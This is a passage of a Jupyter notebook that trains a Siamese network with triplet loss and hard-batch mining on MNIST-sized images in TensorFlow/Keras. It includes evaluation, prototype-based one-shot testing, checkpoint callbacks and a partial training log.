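    plt.title(title)
    plt.show()

# Example usage, assuming the variables defined later in this notebook:
# plot_decomposed_embeddings(decomposed_embeddings_before, y_test[:num_vis],
#                            "Embedding space before training (PCA)")
```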
[
[
"def create_embedding_model(emb_size):\n embedding_model = tf.keras.models.Sequential([\n Dense(4096,\n activation='relu',\n kernel_regularizer=l2(1e-3),\n kernel_initializer='he_uniform',\n input_shape=(x_train_w_h,)),\n Dense(emb_size,\n activation=None,\n kernel_regularizer=l2(1e-3),\n kernel_initializer='he_uniform')\n ])\n\n embedding_model.summary()\n \n return embedding_model",
"_____no_output_____"
]
],
[
[
"### Create the SNN\n\nThis model takes a triplet image input, passes them to the embedding model for embedding, then concats them together for the loss function",
"_____no_output_____"
]
],
[
[
"def create_SNN(embedding_model):\n\n input_anchor = tf.keras.layers.Input(shape=(x_train_w_h,))\n input_positive = tf.keras.layers.Input(shape=(x_train_w_h,))\n input_negative = tf.keras.layers.Input(shape=(x_train_w_h,))\n\n embedding_anchor = embedding_model(input_anchor)\n embedding_positive = embedding_model(input_positive)\n embedding_negative = embedding_model(input_negative)\n\n output = tf.keras.layers.concatenate([embedding_anchor, embedding_positive, \n embedding_negative], axis=1)\n\n siamese_net = tf.keras.models.Model([input_anchor, input_positive, input_negative], \n output)\n siamese_net.summary()\n \n return siamese_net",
"_____no_output_____"
]
],
[
[
"### Create the Triplet Loss Function",
"_____no_output_____"
]
],
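For reference, the loss implemented in the next cell is the standard triplet loss over the embedded anchor, positive and negative images $f(A)$, $f(P)$, $f(N)$ with margin $\alpha$ (the code reduces with the mean rather than the sum over embedding dimensions, which only rescales the distances):

```latex
\mathcal{L}(A, P, N) = \max\!\left( \lVert f(A) - f(P) \rVert_2^{2} - \lVert f(A) - f(N) \rVert_2^{2} + \alpha,\; 0 \right)
```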
[
[
"def triplet_loss(y_true, y_pred):\n anchor, positive, negative = y_pred[:,:emb_size], y_pred[:,emb_size:2*emb_size],y_pred[:,2*emb_size:]\n positive_dist = tf.reduce_mean(tf.square(anchor - positive), axis=1)\n negative_dist = tf.reduce_mean(tf.square(anchor - negative), axis=1)\n return tf.maximum(positive_dist - negative_dist + alpha, 0.)",
"_____no_output_____"
]
],
[
[
"### Data Generator\n\nThis function creates hard batches for the network to train on. `y` is required by TF but not by our model, so just return a filler to keep TF happy.",
"_____no_output_____"
]
],
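A quick usage sketch (assuming `data_generator` and `emb_size` are defined as in this notebook) showing the shapes the generator yields; the batch size of 32 is arbitrary.

```python
# Pull a single batch from the generator to inspect its structure
gen = data_generator(batch_size=32, num_hard=16, split="train")
x_batch, y_dummy = next(gen)

print([part.shape for part in x_batch])  # -> [(32, 784), (32, 784), (32, 784)] anchors/positives/negatives
print(y_dummy.shape)                     # -> (32, 3 * emb_size), filler labels to keep TF happy
```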
[
[
"def data_generator(batch_size=256, num_hard=50, split=\"train\"):\n while True:\n x = create_hard_batch(batch_size, num_hard, split)\n y = np.zeros((batch_size, 3*emb_size))\n yield x, y",
"_____no_output_____"
]
],
[
[
"### Evaluation\n\nAllows for the model's metrics to be visualised and evaluated. Based on [this Medium post](https://medium.com/@crimy/one-shot-learning-siamese-networks-and-triplet-loss-with-keras-2885ed022352) and [this GitHub notebook](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).",
"_____no_output_____"
]
],
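The introduction mentions using class prototypes at inference time, and the next cell defines `generate_prototypes` and `compute_dist`. As a minimal illustration (not part of the original notebook) of how such a prototype dictionary could be used to classify a single query image, assuming `embedding_model`, `prototypes` and `compute_dist` exist as defined in this notebook:

```python
import numpy as np

def classify_with_prototypes(img, embedding_model, prototypes):
    """Return the class whose prototype embedding is nearest to the query image's embedding."""
    query_emb = embedding_model.predict(np.expand_dims(img, axis=0))
    distances = {label: compute_dist(query_emb, proto) for label, proto in prototypes.items()}
    return min(distances, key=distances.get)

# Hypothetical usage once the model is trained:
# prototypes = generate_prototypes(x_test, y_test, embedding_model)
# predicted_label = classify_with_prototypes(x_test[0], embedding_model, prototypes)
```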
[
[
"def compute_dist(a,b):\n return np.linalg.norm(a-b)\n\ndef compute_probs(network,X,Y):\n '''\n Input\n network : current NN to compute embeddings\n X : tensor of shape (m,w,h,1) containing pics to evaluate\n Y : tensor of shape (m,) containing true class\n \n Returns\n probs : array of shape (m,m) containing distances\n \n '''\n m = X.shape[0]\n nbevaluation = int(m*(m-1)/2)\n probs = np.zeros((nbevaluation))\n y = np.zeros((nbevaluation))\n \n #Compute all embeddings for all imgs with current embedding network\n embeddings = embedding_model.predict(X)\n \n k = 0\n \n # For each img in the evaluation set\n for i in range(m):\n # Against all other images\n for j in range(i+1,m):\n # compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes\n probs[k] = -compute_dist(embeddings[i,:],embeddings[j,:])\n if (Y[i]==Y[j]):\n y[k] = 1\n #print(\"{3}:{0} vs {1} : \\t\\t\\t{2}\\tSAME\".format(i,j,probs[k],k, Y[i], Y[j]))\n else:\n y[k] = 0\n #print(\"{3}:{0} vs {1} : {2}\\tDIFF\".format(i,j,probs[k],k, Y[i], Y[j]))\n k += 1\n return probs, y\n\n\ndef compute_metrics(probs,yprobs):\n '''\n Returns\n fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]\n tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].\n thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1\n auc : Area Under the ROC Curve metric\n '''\n # calculate AUC\n auc = roc_auc_score(yprobs, probs)\n # calculate roc curve\n fpr, tpr, thresholds = roc_curve(yprobs, probs)\n \n return fpr, tpr, thresholds,auc\n\ndef draw_roc(fpr, tpr,thresholds, auc):\n #find threshold\n targetfpr=1e-3\n _, idx = find_nearest(fpr,targetfpr)\n threshold = thresholds[idx]\n recall = tpr[idx]\n \n \n # plot no skill\n plt.plot([0, 1], [0, 1], linestyle='--')\n # plot the roc curve for the model\n plt.plot(fpr, tpr, marker='.')\n plt.title('AUC: {0:.3f}\\nSensitivity : {2:.1%} @FPR={1:.0e}\\nThreshold={3})'.format(auc,targetfpr,recall,abs(threshold) ))\n # show the plot\n plt.show()\n \ndef find_nearest(array,value):\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return array[idx-1],idx-1\n else:\n return array[idx],idx\n \ndef draw_interdist(network, epochs):\n interdist = compute_interdist(network)\n \n data = []\n for i in range(num_classes):\n data.append(np.delete(interdist[i,:],[i]))\n\n fig, ax = plt.subplots()\n ax.set_title('Evaluating embeddings distance from each other after {0} epochs'.format(epochs))\n ax.set_ylim([0,3])\n plt.xlabel('Classes')\n plt.ylabel('Distance')\n ax.boxplot(data,showfliers=False,showbox=True)\n locs, labels = plt.xticks()\n plt.xticks(locs,np.arange(num_classes))\n\n plt.show()\n \n \ndef compute_interdist(network):\n '''\n Computes sum of distances between all classes embeddings on our reference test image: \n d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... 
d(8,9)\n A good model should have a large distance between all theses embeddings\n \n Returns:\n array of shape (num_classes,num_classes) \n '''\n res = np.zeros((num_classes,num_classes))\n \n ref_images = np.zeros((num_classes, x_test_w_h))\n \n #generates embeddings for reference images\n for i in range(num_classes):\n ref_images[i,:] = x_test[i]\n \n ref_embeddings = network.predict(ref_images)\n \n for i in range(num_classes):\n for j in range(num_classes):\n res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])\n return res\n\ndef DrawTestImage(network, images, refidx=0):\n '''\n Evaluate some pictures vs some samples in the test set\n image must be of shape(1,w,h,c)\n \n Returns\n scores : result of the similarity scores with the basic images => (N)\n \n '''\n nbimages = images.shape[0]\n \n \n #generates embedings for given images\n image_embedings = network.predict(images)\n \n #generates embedings for reference images\n ref_images = np.zeros((num_classes,x_test_w_h))\n for i in range(num_classes):\n images_at_this_index_are_of_class_i = np.squeeze(np.where(y_test == i))\n ref_images[i,:] = x_test[images_at_this_index_are_of_class_i[refidx]]\n \n \n ref_embedings = network.predict(ref_images)\n \n for i in range(nbimages):\n # Prepare the figure\n fig=plt.figure(figsize=(16,2))\n subplot = fig.add_subplot(1,num_classes+1,1)\n plt.axis(\"off\")\n plotidx = 2\n \n # Draw this image \n plt.imshow(np.reshape(images[i], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\n subplot.title.set_text(\"Test image\")\n \n for ref in range(num_classes):\n #Compute distance between this images and references\n dist = compute_dist(image_embedings[i,:],ref_embedings[ref,:])\n #Draw\n subplot = fig.add_subplot(1,num_classes+1,plotidx)\n plt.axis(\"off\")\n plt.imshow(np.reshape(ref_images[ref, :], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\n subplot.title.set_text((\"Class {0}\\n{1:.3e}\".format(ref,dist)))\n plotidx += 1\n\ndef generate_prototypes(x_data, y_data, embedding_model):\n classes = np.unique(y_data)\n prototypes = {}\n\n for c in classes:\n #c = classes[0]\n # Find all images of the chosen test class\n locations_of_c = np.where(y_data == c)[0]\n\n imgs_of_c = x_data[locations_of_c]\n\n imgs_of_c_embeddings = embedding_model.predict(imgs_of_c)\n\n # Get the median of the embeddings to generate a prototype for the class (reshaping for PCA)\n prototype_for_c = np.median(imgs_of_c_embeddings, axis = 0).reshape(1, -1)\n # Add it to the prototype dict\n prototypes[c] = prototype_for_c\n \n return prototypes\n \ndef test_one_shot_prototypes(network, sample_embeddings):\n distances_from_img_to_test_against = []\n # As the img to test against is in index 0, we compare distances between img@0 and all others\n for i in range(1, len(sample_embeddings)):\n distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))\n # As the correct img will be at distances_from_img_to_test_against index 0 (sample_imgs index 1),\n # If the smallest distance in distances_from_img_to_test_against is at index 0, \n # we know the one shot test got the right answer\n is_min = distances_from_img_to_test_against[0] == min(distances_from_img_to_test_against)\n is_max = distances_from_img_to_test_against[0] == max(distances_from_img_to_test_against)\n return int(is_min and not is_max)\n \ndef n_way_accuracy_prototypes(n_val, n_way, network):\n num_correct = 0\n \n for val_step in range(n_val):\n num_correct += load_one_shot_test_batch_prototypes(n_way, network)\n \n 
accuracy = num_correct / n_val * 100\n \n return accuracy\n\ndef load_one_shot_test_batch_prototypes(n_way, network):\n \n labels = np.unique(y_test)\n # Reduce the label set down from size n_classes to n_samples \n labels = np.random.choice(labels, size = n_way, replace = False)\n\n # Choose a class as the test image\n label = random.choice(labels)\n # Find all images of the chosen test class\n imgs_of_label = np.where(y_test == label)[0]\n\n # Randomly select a test image of the selected class, return it's index\n img_of_label_idx = random.choice(imgs_of_label)\n\n # Expand the array at the selected indexes into useable images\n img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)\n \n sample_embeddings = []\n # Get the anchor image embedding\n anchor_prototype = network.predict(img_of_label)\n sample_embeddings.append(anchor_prototype)\n \n # Get the prototype embedding for the positive class\n positive_prototype = prototypes[label]\n \n sample_embeddings.append(positive_prototype)\n \n # Get the negative prototype embeddings\n # Remove the selected test class from the list of labels based on it's index \n label_idx_in_labels = np.where(labels == label)[0]\n other_labels = np.delete(labels, label_idx_in_labels)\n \n # Get the embedding for each of the remaining negatives\n for other_label in other_labels:\n negative_prototype = prototypes[other_label]\n sample_embeddings.append(negative_prototype)\n \n correct = test_one_shot_prototypes(network, sample_embeddings)\n\n return correct\n\n\ndef visualise_n_way_prototypes(n_samples, network):\n labels = np.unique(y_test)\n # Reduce the label set down from size n_classes to n_samples \n labels = np.random.choice(labels, size = n_samples, replace = False)\n\n # Choose a class as the test image\n label = random.choice(labels)\n # Find all images of the chosen test class\n imgs_of_label = np.where(y_test == label)[0]\n\n # Randomly select a test image of the selected class, return it's index\n img_of_label_idx = random.choice(imgs_of_label)\n\n # Get another image idx that we know is of the test class for the sample set\n label_sample_img_idx = random.choice(imgs_of_label)\n\n # Expand the array at the selected indexes into useable images\n img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)\n label_sample_img = np.expand_dims(x_test[label_sample_img_idx],axis=0)\n \n # Make the first img in the sample set the chosen test image, the second the other image\n sample_imgs = np.empty((0, x_test_w_h))\n sample_imgs = np.append(sample_imgs, img_of_label, axis=0)\n sample_imgs = np.append(sample_imgs, label_sample_img, axis=0)\n \n sample_embeddings = []\n \n # Get the anchor embedding image\n anchor_prototype = network.predict(img_of_label)\n sample_embeddings.append(anchor_prototype)\n \n # Get the prototype embedding for the positive class\n positive_prototype = prototypes[label]\n sample_embeddings.append(positive_prototype)\n\n # Get the negative prototype embeddings\n # Remove the selected test class from the list of labels based on it's index \n label_idx_in_labels = np.where(labels == label)[0]\n other_labels = np.delete(labels, label_idx_in_labels)\n # Get the embedding for each of the remaining negatives\n for other_label in other_labels:\n negative_prototype = prototypes[other_label]\n sample_embeddings.append(negative_prototype)\n \n # Find all images of the other class\n imgs_of_other_label = np.where(y_test == other_label)[0]\n # Randomly select an image of the selected class, return it's index\n 
another_sample_img_idx = random.choice(imgs_of_other_label)\n # Expand the array at the selected index into useable images\n another_sample_img = np.expand_dims(x_test[another_sample_img_idx],axis=0)\n # Add the image to the support set\n sample_imgs = np.append(sample_imgs, another_sample_img, axis=0)\n \n distances_from_img_to_test_against = []\n \n # As the img to test against is in index 0, we compare distances between img@0 and all others\n for i in range(1, len(sample_embeddings)):\n distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))\n \n # + 1 as distances_from_img_to_test_against doesn't include the test image\n min_index = distances_from_img_to_test_against.index(min(distances_from_img_to_test_against)) + 1\n \n return sample_imgs, min_index\n\ndef evaluate(embedding_model, epochs = 0):\n probs,yprob = compute_probs(embedding_model, x_test[:500, :], y_test[:500])\n fpr, tpr, thresholds, auc = compute_metrics(probs,yprob)\n draw_roc(fpr, tpr, thresholds, auc)\n draw_interdist(embedding_model, epochs)\n\n for i in range(3):\n DrawTestImage(embedding_model, np.expand_dims(x_train[i],axis=0))",
"_____no_output_____"
]
],
[
[
"### Model Training Setup\n\nFaceNet, the original triplet batch paper, draws a large random sample of triplets respecting the class distribution then picks N/2 hard and N/2 random samples (N = batch size), along with an `alpha` of 0.2\n\nLogs out to Tensorboard, callback adapted from https://stackoverflow.com/a/52581175.\n\nSaves best model only based on a validation loss. Adapted from https://stackoverflow.com/a/58103272.",
"_____no_output_____"
]
],
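Because the callbacks described above save both the model configuration JSON and the best embedding weights, a saved embedding model can later be restored along these lines (a hedged sketch; the log directory and the epoch number in the weights filename are placeholders following the patterns used in the cell below):

```python
import os
from tensorflow.keras.models import model_from_json

logdir = "PATH/TO/LOGDIR/snn-example-run"  # same placeholder path as used below

# Rebuild the embedding model architecture from its saved config...
with open(os.path.join(logdir, "embedding_config.json"), "r") as json_file:
    loaded_embedding_model = model_from_json(json_file.read())

# ...then load the best saved weights (the epoch number here is hypothetical)
loaded_embedding_model.load_weights(os.path.join(logdir, "emb_model-51.h5"))

# The restored model can now embed new images:
# embeddings = loaded_embedding_model.predict(x_test[:10])
```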
[
[
"# Hyperparams\nbatch_size = 256\nepochs = 100\nsteps_per_epoch = int(x_train.shape[0]/batch_size)\nval_steps = int(x_test.shape[0]/batch_size)\nalpha = 0.2\nnum_hard = int(batch_size * 0.5) # Number of semi-hard triplet examples in the batch\nlr = 0.00006\noptimiser = 'Adam'\nemb_size = 10\n\nwith tf.device(\"/cpu:0\"):\n # Create the embedding model\n print(\"Generating embedding model... \\n\")\n embedding_model = create_embedding_model(emb_size)\n \n print(\"\\nGenerating SNN... \\n\")\n # Create the SNN\n siamese_net = create_SNN(embedding_model)\n # Compile the SNN\n optimiser_obj = Adam(lr = lr)\n siamese_net.compile(loss=triplet_loss, optimizer= optimiser_obj)\n \n # Store visualisations of the embeddings using PCA for display next to \"after training\" for comparisons\n num_vis = 500 # Take only the first num_vis elements of the test set to visualise\n embeddings_before_train = embedding_model.predict(x_test[:num_vis, :])\n pca = PCA(n_components=2)\n decomposed_embeddings_before = pca.fit_transform(embeddings_before_train)\n\n\n# Display evaluation the untrained model\nprint(\"\\nEvaluating the model without training for a baseline...\\n\")\nevaluate(embedding_model)\n\n# Set up logging directory\n## Use date-time as logdir name:\n#dt = datetime.now().strftime(\"%Y%m%dT%H%M\")\n#logdir = os.path.join(\"PATH/TO/LOGDIR\",dt)\n\n## Use a custom non-dt name:\nname = \"snn-example-run\"\nlogdir = os.path.join(\"PATH/TO/LOGDIR\",name)\n\nif not os.path.exists(logdir):\n os.mkdir(logdir)\n\n## Callbacks:\n# Create the TensorBoard callback\ntensorboard = tf.keras.callbacks.TensorBoard(\n log_dir = logdir,\n histogram_freq=0,\n batch_size=batch_size,\n write_graph=True,\n write_grads=True, \n write_images = True, \n update_freq = 'epoch', \n profile_batch=0\n)\n\n# Training logger\ncsv_log = os.path.join(logdir, 'training.csv')\ncsv_logger = CSVLogger(csv_log, separator=',', append=True)\n\n# Only save the best model weights based on the val_loss\ncheckpoint = ModelCheckpoint(os.path.join(logdir, 'snn_model-{epoch:02d}-{val_loss:.2f}.h5'),\n monitor='val_loss', verbose=1,\n save_best_only=True, save_weights_only=True, \n mode='auto')\n\n# Save the embedding mode weights based on the main model's val loss\n# This is needed to reecreate the emebedding model should we wish to visualise\n# the latent space at the saved epoch\nclass SaveEmbeddingModelWeights(Callback):\n def __init__(self, filepath, monitor='val_loss', verbose=1):\n super(Callback, self).__init__()\n self.monitor = monitor\n self.verbose = verbose\n self.best = np.Inf\n self.filepath = filepath\n\n def on_epoch_end(self, epoch, logs={}):\n current = logs.get(self.monitor)\n if current is None:\n warnings.warn(\"SaveEmbeddingModelWeights requires %s available!\" % self.monitor, RuntimeWarning)\n\n if current < self.best:\n filepath = self.filepath.format(epoch=epoch + 1, **logs)\n #if self.verbose == 1:\n #print(\"Saving embedding model weights at %s\" % filepath)\n embedding_model.save_weights(filepath, overwrite = True)\n self.best = current\n\n# Save the embedding model weights if you save a new snn best model based on the model checkpoint above\nemb_weight_saver = SaveEmbeddingModelWeights(os.path.join(logdir, 'emb_model-{epoch:02d}.h5'))\n\n\ncallbacks = [tensorboard, csv_logger, checkpoint, emb_weight_saver]\n\n\n# Save model configs to JSON\nmodel_json = siamese_net.to_json()\nwith open(os.path.join(logdir, \"siamese_config.json\"), \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n \nmodel_json = 
embedding_model.to_json()\nwith open(os.path.join(logdir, \"embedding_config.json\"), \"w\") as json_file:\n json_file.write(model_json)\n json_file.close()\n \n\nhyperparams = {'batch_size' : batch_size,\n 'epochs' : epochs, \n 'steps_per_epoch' : steps_per_epoch, \n 'val_steps' : val_steps, \n 'alpha' : alpha, \n 'num_hard' : num_hard, \n 'optimiser' : optimiser,\n 'lr' : lr,\n 'emb_size' : emb_size\n }\n\n\nwith open(os.path.join(logdir, \"hyperparams.json\"), \"w\") as json_file:\n json.dump(hyperparams, json_file)\n \n# Set the model to TB\ntensorboard.set_model(siamese_net)\n\n\ndef delete_older_model_files(filepath):\n \n model_dir = filepath.split(\"emb_model\")[0]\n \n # Get model files\n model_files = os.listdir(model_dir)\n\n # Get only the emb_model files\n emb_model_files = [file for file in model_files if \"emb_model\" in file]\n # Get the epoch nums of the emb_model_files\n emb_model_files_epoch_nums = [int(file.split(\"-\")[1].split(\".h5\")[0]) for file in emb_model_files]\n\n # Find all the snn model files\n snn_model_files = [file for file in model_files if \"snn_model\" in file]\n\n # Sort, get highest epoch num\n emb_model_files_epoch_nums.sort()\n highest_epoch_num = str(emb_model_files_epoch_nums[-1]).zfill(2)\n\n # Filter the emb_model and snn_model file lists to remove the highest epoch number ones\n emb_model_files_without_highest = [file for file in emb_model_files if highest_epoch_num not in file]\n snn_model_files_without_highest = [file for file in snn_model_files if (\"-\" + highest_epoch_num + \"-\") not in file]\n\n # Delete the non-highest model files from the subdir\n if len(emb_model_files_without_highest) != 0:\n print(\"Deleting previous best model file\")\n for model_file_list in [emb_model_files_without_highest, snn_model_files_without_highest]:\n for file in model_file_list:\n os.remove(os.path.join(model_dir, file))",
"Generating embedding model... \n\nModel: \"sequential_2\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ndense_4 (Dense) (None, 4096) 3215360 \n_________________________________________________________________\ndense_5 (Dense) (None, 10) 40970 \n=================================================================\nTotal params: 3,256,330\nTrainable params: 3,256,330\nNon-trainable params: 0\n_________________________________________________________________\n\nGenerating SNN... \n\nModel: \"model_4\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_7 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\ninput_8 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\ninput_9 (InputLayer) [(None, 784)] 0 \n__________________________________________________________________________________________________\nsequential_2 (Sequential) (None, 10) 3256330 input_7[0][0] \n input_8[0][0] \n input_9[0][0] \n__________________________________________________________________________________________________\nconcatenate_2 (Concatenate) (None, 30) 0 sequential_2[1][0] \n sequential_2[2][0] \n sequential_2[3][0] \n==================================================================================================\nTotal params: 3,256,330\nTrainable params: 3,256,330\nNon-trainable params: 0\n__________________________________________________________________________________________________\n\nEvaluating the model without training for a baseline...\n\n"
]
],
[
[
"### Show example batches\n\nBased on code found [here](https://zhangruochi.com/Create-a-Siamese-Network-with-Triplet-Loss-in-Keras/2020/08/11/).",
"_____no_output_____"
]
],
[
[
"# Display sample batches. This has to be performed after the embedding model is created\n# as create_batch_hard utilises the model to see which batches are actually hard.\n\nexamples = create_batch(1)\nprint(\"Example triplet batch:\")\nplot_triplets(examples)\n\nprint(\"Example semi-hard triplet batch:\")\nex_hard = create_hard_batch(1, 1, split=\"train\")\nplot_triplets(ex_hard)",
"Example triplet batch:\n"
]
],
[
[
"### Training\n\nUsing `.fit(workers = 0)` fixes the error when using hard batches where TF can't predict on the embedding network whilst fitting the siamese network (see: https://github.com/keras-team/keras/issues/5511#issuecomment-427666222).",
"_____no_output_____"
]
],
[
[
"def get_num_gpus():\n local_device_protos = device_lib.list_local_devices()\n return len([x.name for x in local_device_protos if x.device_type == 'GPU'])\n\n## Training:\n#print(\"Logging out to Tensorboard at:\", logdir)\nprint(\"Starting training process!\")\nprint(\"-------------------------------------\")\n\n# Make the model work over the two GPUs we have\nnum_gpus = get_num_gpus()\nparallel_snn = multi_gpu_model(siamese_net, gpus = num_gpus)\nbatch_per_gpu = int(batch_size / num_gpus)\n\nparallel_snn.compile(loss=triplet_loss, optimizer= optimiser_obj)\n\nsiamese_history = parallel_snn.fit(\n data_generator(batch_per_gpu, num_hard),\n steps_per_epoch=steps_per_epoch,\n epochs=epochs,\n verbose=1,\n callbacks=callbacks, \n workers = 0, \n validation_data = data_generator(batch_per_gpu, num_hard, split=\"test\"), \n validation_steps = val_steps)\n\nprint(\"-------------------------------------\")\nprint(\"Training complete.\")",
"Starting training process!\n-------------------------------------\nEpoch 1/100\n233/234 [============================>.] - ETA: 0s - loss: 6.9986\nEpoch 00001: val_loss improved from inf to 5.79736, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-01-5.80.h5\n234/234 [==============================] - 174s 742ms/step - loss: 6.9935 - val_loss: 5.7974\nEpoch 2/100\n233/234 [============================>.] - ETA: 0s - loss: 4.8596\nEpoch 00002: val_loss improved from 5.79736 to 4.00626, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-02-4.01.h5\n234/234 [==============================] - 170s 728ms/step - loss: 4.8560 - val_loss: 4.0063\nEpoch 3/100\n233/234 [============================>.] - ETA: 0s - loss: 3.3463\nEpoch 00003: val_loss improved from 4.00626 to 2.74879, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-03-2.75.h5\n234/234 [==============================] - 170s 725ms/step - loss: 3.3438 - val_loss: 2.7488\nEpoch 4/100\n233/234 [============================>.] - ETA: 0s - loss: 2.2919\nEpoch 00004: val_loss improved from 2.74879 to 1.87885, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-04-1.88.h5\n234/234 [==============================] - 170s 726ms/step - loss: 2.2901 - val_loss: 1.8789\nEpoch 5/100\n233/234 [============================>.] - ETA: 0s - loss: 1.5656\nEpoch 00005: val_loss improved from 1.87885 to 1.28401, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-05-1.28.h5\n234/234 [==============================] - 172s 733ms/step - loss: 1.5644 - val_loss: 1.2840\nEpoch 6/100\n233/234 [============================>.] - ETA: 0s - loss: 1.0720\nEpoch 00006: val_loss improved from 1.28401 to 0.88143, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-06-0.88.h5\n234/234 [==============================] - 174s 742ms/step - loss: 1.0712 - val_loss: 0.8814\nEpoch 7/100\n233/234 [============================>.] - ETA: 0s - loss: 0.7392\nEpoch 00007: val_loss improved from 0.88143 to 0.61174, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-07-0.61.h5\n234/234 [==============================] - 170s 728ms/step - loss: 0.7387 - val_loss: 0.6117\nEpoch 8/100\n233/234 [============================>.] - ETA: 0s - loss: 0.5158\nEpoch 00008: val_loss improved from 0.61174 to 0.43090, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-08-0.43.h5\n234/234 [==============================] - 171s 729ms/step - loss: 0.5155 - val_loss: 0.4309\nEpoch 9/100\n233/234 [============================>.] - ETA: 0s - loss: 0.3670\nEpoch 00009: val_loss improved from 0.43090 to 0.30955, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-09-0.31.h5\n234/234 [==============================] - 171s 731ms/step - loss: 0.3667 - val_loss: 0.3095\nEpoch 10/100\n233/234 [============================>.] - ETA: 0s - loss: 0.2651\nEpoch 00010: val_loss improved from 0.30955 to 0.22544, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-10-0.23.h5\n234/234 [==============================] - 167s 715ms/step - loss: 0.2649 - val_loss: 0.2254\nEpoch 11/100\n233/234 [============================>.] - ETA: 0s - loss: 0.1966\nEpoch 00011: val_loss improved from 0.22544 to 0.17017, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-11-0.17.h5\n234/234 [==============================] - 166s 711ms/step - loss: 0.1965 - val_loss: 0.1702\nEpoch 12/100\n233/234 [============================>.] 
- ETA: 0s - loss: 0.1488\nEpoch 00012: val_loss improved from 0.17017 to 0.13102, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-12-0.13.h5\n234/234 [==============================] - 167s 713ms/step - loss: 0.1488 - val_loss: 0.1310\nEpoch 13/100\n233/234 [============================>.] - ETA: 0s - loss: 0.1153\nEpoch 00013: val_loss improved from 0.13102 to 0.10136, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-13-0.10.h5\n234/234 [==============================] - 169s 722ms/step - loss: 0.1153 - val_loss: 0.1014\nEpoch 14/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0924\nEpoch 00014: val_loss improved from 0.10136 to 0.08184, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-14-0.08.h5\n234/234 [==============================] - 168s 718ms/step - loss: 0.0923 - val_loss: 0.0818\nEpoch 15/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0752\nEpoch 00015: val_loss improved from 0.08184 to 0.06727, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-15-0.07.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0752 - val_loss: 0.0673\nEpoch 16/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0640\nEpoch 00016: val_loss improved from 0.06727 to 0.05794, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-16-0.06.h5\n234/234 [==============================] - 167s 712ms/step - loss: 0.0640 - val_loss: 0.0579\nEpoch 17/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0548\nEpoch 00017: val_loss improved from 0.05794 to 0.05117, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-17-0.05.h5\n234/234 [==============================] - 169s 720ms/step - loss: 0.0548 - val_loss: 0.0512\nEpoch 18/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0485\nEpoch 00018: val_loss improved from 0.05117 to 0.04612, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-18-0.05.h5\n234/234 [==============================] - 167s 714ms/step - loss: 0.0485 - val_loss: 0.0461\nEpoch 19/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0439\nEpoch 00019: val_loss improved from 0.04612 to 0.04303, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-19-0.04.h5\n234/234 [==============================] - 168s 716ms/step - loss: 0.0438 - val_loss: 0.0430\nEpoch 20/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0412\nEpoch 00020: val_loss improved from 0.04303 to 0.04107, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-20-0.04.h5\n234/234 [==============================] - 169s 723ms/step - loss: 0.0412 - val_loss: 0.0411\nEpoch 21/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0390\nEpoch 00021: val_loss improved from 0.04107 to 0.03768, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-21-0.04.h5\n234/234 [==============================] - 168s 718ms/step - loss: 0.0390 - val_loss: 0.0377\nEpoch 22/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0367\nEpoch 00022: val_loss improved from 0.03768 to 0.03581, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-22-0.04.h5\n234/234 [==============================] - 167s 715ms/step - loss: 0.0367 - val_loss: 0.0358\nEpoch 23/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0357\nEpoch 00023: val_loss did not improve from 0.03581\n234/234 [==============================] - 168s 720ms/step - loss: 0.0357 - val_loss: 0.0358\nEpoch 24/100\n233/234 [============================>.] 
